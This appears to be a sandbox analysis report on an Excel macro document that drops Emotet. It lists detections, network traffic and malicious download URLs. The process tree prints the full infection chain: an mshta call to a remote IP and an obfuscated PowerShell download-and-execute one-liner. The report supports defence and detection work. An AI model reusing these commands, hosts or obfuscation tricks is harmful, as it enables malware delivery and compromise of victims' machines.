Windows Analysis Report
imedpub_2.xls

Overview

General Information

Sample Name: imedpub_2.xls
Analysis ID: 562406
MD5: 9152f953f0fb28e90fc2cdaa4dc8c6ce
SHA1: e82a389da3baa5a094df5ecc49ac23aa951466d8
SHA256: 131c6cbabbaa04e8953a7647ed6a2245a415ff9a2fdd63620bdb9cdc29c479d4
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2816 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2684 cmdline: cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2692 cmdline: mshta http://91.240.118.168/zqqw/zaas/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 1940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 3000 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2180 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 252 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2308 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1268 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2976 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2696 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 380 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
Source: imedpub_2.xls, Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Author: John Lambert @JohnLaTwC, Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x242a2:$s1: Excel
  • 0x25313:$s1: Excel
  • 0x4831:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: imedpub_2.xls, Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Author: Joe Security
Source: imedpub_2.xls, Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Author: ditekSHen, Strings:
  • 0x47b7:$e2: 00 4D 61 63 72 6F 31 85 00
  • 0x4831:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
  • 0x946:$x1: * #,##0
  • 0x952:$x1: * #,##0
  • 0x9fb:$x1: * #,##0
  • 0xa0a:$x1: * #,##0
  • 0xa36:$x1: * #,##0

Source: C:\Users\user\Desktop\imedpub_2.xls, Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Author: John Lambert @JohnLaTwC, Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x242a2:$s1: Excel
  • 0x25313:$s1: Excel
  • 0x4831:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: C:\Users\user\Desktop\imedpub_2.xls, Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Author: Joe Security
Source: C:\Users\user\Desktop\imedpub_2.xls, Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Author: ditekSHen, Strings:
  • 0x47b7:$e2: 00 4D 61 63 72 6F 31 85 00
  • 0x4831:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
  • 0x946:$x1: * #,##0
  • 0x952:$x1: * #,##0
  • 0x9fb:$x1: * #,##0
  • 0xa0a:$x1: * #,##0
  • 0xa36:$x1: * #,##0
Source: C:\ProgramData\QWER.dll, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security

Source: 0000000A.00000002.523913691.0000000002621000.00000020.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 0000000C.00000002.578128416.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 0000000A.00000002.523436520.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 0000000C.00000002.577400839.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security

Source: 10.2.rundll32.exe.2f10000.12.raw.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 16.2.rundll32.exe.210000.1.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 12.2.rundll32.exe.410000.3.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 10.2.rundll32.exe.300000.2.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
Source: 12.2.rundll32.exe.27b0000.9.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security

System Summary

Source: File created, Author: Florian Roth, Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2692, TargetFilename: C:\Users\user\AppData\Local
Source: Process started, Author: Michael Haag, Data: Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zqqw/zaas/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2692, ProcessId: 1940
Source: Process started, Author: Florian Roth, Data: Command / CommandLine / ProcessCommandLine: mshta http://91.240.118.168/zqqw/zaas/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2684, ProcessId: 2692
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Data: Command / CommandLine / ProcessCommandLine: cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2816, ProcessId: 2684
Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp), Data: identical to the powershell.exe process start above (ProcessId: 1940, ParentProcessId: 2692)
Source: Process started, Author: Florian Roth, Data: identical to the powershell.exe process start above (ProcessId: 1940, ParentProcessId: 2692)
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: identical to the powershell.exe process start above (ProcessId: 1940, ParentProcessId: 2692)

AV Detection

                            Source: 10.2.rundll32.exe.140000.0.raw.unpack, Malware Configuration Extractor: Emotet (C2 list and public keys)
                            Source: imedpub_2.xls, ReversingLabs: Detection: 27%
                            Source: C:\ProgramData\QWER.dll, Joe Sandbox ML: detected
                            Source: unknown, HTTPS traffic detected: 162.241.211.118:443 -> 192.168.2.22:49169 version: TLS 1.0
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_10021854 __EH_prolog3, GetFullPathNameA, PathIsUNCA, GetVolumeInformationA, CharUpperA, FindFirstFileA, FindClose, lstrlenA, 9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 11_2_10021854 __EH_prolog3, GetFullPathNameA, PathIsUNCA, GetVolumeInformationA, CharUpperA, FindFirstFileA, FindClose, lstrlenA, 11_2_10021854

                            Software Vulnerabilities

                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\cmd.exe
                            Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
                            Source: global traffic, DNS query: name: praachichemfood.com
                            Source: global traffic, TCP traffic: 192.168.2.22:49169 -> 162.241.211.118:443

                            Networking

                            Source: Traffic, Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
                            Source: Malware configuration extractor, IPs: C2 addresses from the malware configuration
                            Source: Joe Sandbox View, JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                            Source: global traffic, HTTP traffic detected: GET /wp-includes/dkCFwyE/ HTTP/1.1 Host: dtmconsulting.ca Connection: Keep-Alive
                            Source: global traffic, HTTP traffic detected: GET /zqqw/zaas/fe.png HTTP/1.1 Host: 91.240.118.168 Connection: Keep-Alive
                            Source: global traffic, HTTP traffic detected: GET /public_html/SWmteCWBUkA89/ HTTP/1.1 Host: praachichemfood.com Connection: Keep-Alive
                            Source: global traffic, HTTP traffic detected: GET /public_html/SWmteCWBUkA89/ HTTP/1.1 Host: www.praachichemfood.com Connection: Keep-Alive
                            Source: unknown, HTTPS traffic detected: 162.241.211.118:443 -> 192.168.2.22:49169 version: TLS 1.0
                            Source: global traffic, HTTP traffic detected: GET /zqqw/zaas/fe.html HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.168 Connection: Keep-Alive
                            Source: Joe Sandbox View, ASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox View, ASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox View, IP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox View, IP Address: 185.157.82.211 185.157.82.211
                            Source: unknown, Network traffic detected: IP country count 22
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lodev7.c
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lodev7.com/wp-content/dp
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lodev7.com/wp-content/dpwjiJivrpgO1F2/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lodev7.com/wp-content/dpwjiJivrpgO1F2/PE3
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mortgageadviser.director
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/PE3
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onewaymedia.ro/wp-includ
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onewaymedia.ro/wp-includes/k/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onewaymedia.ro/wp-includes/k/PE3
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js
                            Source: powershell.exe, 00000006.00000002.675532532.0000000002A47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675478649.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trochoi80club.com/wp-con
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trochoi80club.com/wp-content/6shnRU/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trochoi80club.com/wp-content/6shnRU/PE3
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://worldaviationhub.com/wp-
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://worldaviationhub.com/wp-includes/Lik/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://worldaviationhub.com/wp-includes/Lik/PE3
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.praachichemfood.com/comments/feed/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.praachichemfood.com/feed/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.praachichemfood.com/wp-json/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.praachichemfood.com/xmlrpc.php?rsd
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.yepproject.org/wp-in
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/
                            Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/PE3
                            Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
                            Source: unknown DNS traffic detected: queries for: praachichemfood.com
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: global traffic HTTP traffic detected: GET /wp-includes/dkCFwyE/ HTTP/1.1
                                Host: dtmconsulting.ca
                                Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /zqqw/zaas/fe.html HTTP/1.1
                                Accept: */*
                                Accept-Language: en-US
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 91.240.118.168
                                Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /zqqw/zaas/fe.png HTTP/1.1
                                Host: 91.240.118.168
                                Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /public_html/SWmteCWBUkA89/ HTTP/1.1
                                Host: praachichemfood.com
                                Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /public_html/SWmteCWBUkA89/ HTTP/1.1
                                Host: www.praachichemfood.com
                                Connection: Keep-Alive
                            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
                            Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                                Date: Fri, 28 Jan 2022 20:04:49 GMT
                                Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
                                X-Powered-By: PHP/7.3.31
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://www.praachichemfood.com/wp-json/>; rel="https://api.w.org/"
                                Vary: User-Agent
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Transfer-Encoding: chunked
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 32 0d 0a 0d 0a 0d 0a
                                Data Ascii: 2
                            Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: mshta.exe, 00000004.00000002.441100884.00000000004FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419347638.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.441100884.00000000004FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419347638.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: powershell.exe, 00000006.00000002.675532532.0000000002A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            Source: Yara match File source: 10.2.rundll32.exe.2f10000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000011.00000002.675011000.0000000000790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523320512.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578029021.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: C:\ProgramData\QWER.dll, type: DROPPED

                            System Summary

                            Source: imedpub_2.xls, Macro extractor: Sheet: Macro1 contains: mshta
                            Source: imedpub_2.xls, type: SAMPLE, Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders, Author: ditekSHen
                            Source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPED, Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders, Author: ditekSHen
                            Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 25 .
                            Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 16 , , Previewing is not available for protected documents. 17
                            Source: Screenshot number: 4, Screenshot OCR: protected documents. 17 18 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 25 . J u 26 27 28 29
                            Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: imedpub_2.xls, Stream path 'Workbook'
                            Source: imedpub_2.xls.0.dr, Stream path 'Workbook'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\ProgramData\QWER.dll
                            Source: imedpub_2.xls, Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026F8FD11_2_0026F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026E99111_2_0026E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026AB8711_2_0026AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027000111_2_00270001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026901111_2_00269011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027907F11_2_0027907F
